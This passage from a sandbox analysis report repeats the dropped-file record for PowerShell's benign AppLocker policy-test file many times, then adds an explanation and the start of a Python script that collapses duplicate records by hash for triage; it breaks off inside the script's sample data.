                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                         (The record above, the PowerShell AppLocker policy-test file with MD5 D17FE0A3F47BE24A6453E9EF58C94641 and SHA-256 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7, is listed 16 more times in the report with identical process, size, hashes and preview: one copy for each test file written by a powershell.exe start during the analysis. The repeated records are omitted here.)
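Runs of identical records like the ones above are easier to triage once collapsed by content hash: the count tells you how many times the platform artefact was written, and the files that are actually worth opening stop being buried. The script below is an added example, not part of the Joe Sandbox report. It parses the key:value layout of these entries, groups them by SHA-256 and counts repeats. RECORDS is a constructed excerpt assembled from the entries on this page, and the only hash it treats as known-benign is that of the PowerShell AppLocker policy-test file shown above (PowerShell writes that file, as __PSScriptPolicyTest_*.ps1 and .psm1 under the user's temp directory, each time it starts in order to learn whether an AppLocker or WDAC policy is enforcing; it is not something the sample drops).

```python
"""
Collapse a sandbox "Dropped files" listing into one line per unique
content hash, so a run of identical platform artefacts does not hide
the files the sample itself wrote.

Added example; RECORDS is a constructed excerpt with the same key:value
layout as the report entries (two AppLocker test-file records and one
SQLite record, keys trimmed to what the script needs).
"""

RECORDS = """\
Process:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
File Type:ASCII text, with no line terminators
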